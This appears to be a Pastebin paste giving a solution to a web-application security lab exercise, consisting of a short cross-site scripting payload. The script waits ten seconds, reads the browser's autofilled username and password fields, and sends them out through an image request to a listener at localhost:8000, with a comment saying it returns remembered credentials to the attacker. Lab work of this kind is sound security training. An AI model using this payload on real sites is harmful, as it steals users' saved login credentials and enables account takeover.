n0va_sa

JFP 12 Solution [getting rembered creds]

Sep 22nd, 2017
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //.com/lab/webapp/jfp/12
  2. <script>
  3. setTimeout(function(){
  4.     arr = document.querySelectorAll('.input-block-level');
  5.     new Image().src = "http://localhost:8000/?user="+arr[0].value+"&value="+arr[1].value;
  6. },10000);
  7. //returns the remembers user creds to the attacker
  8. </script>
Add Comment
Please, Sign In to add comment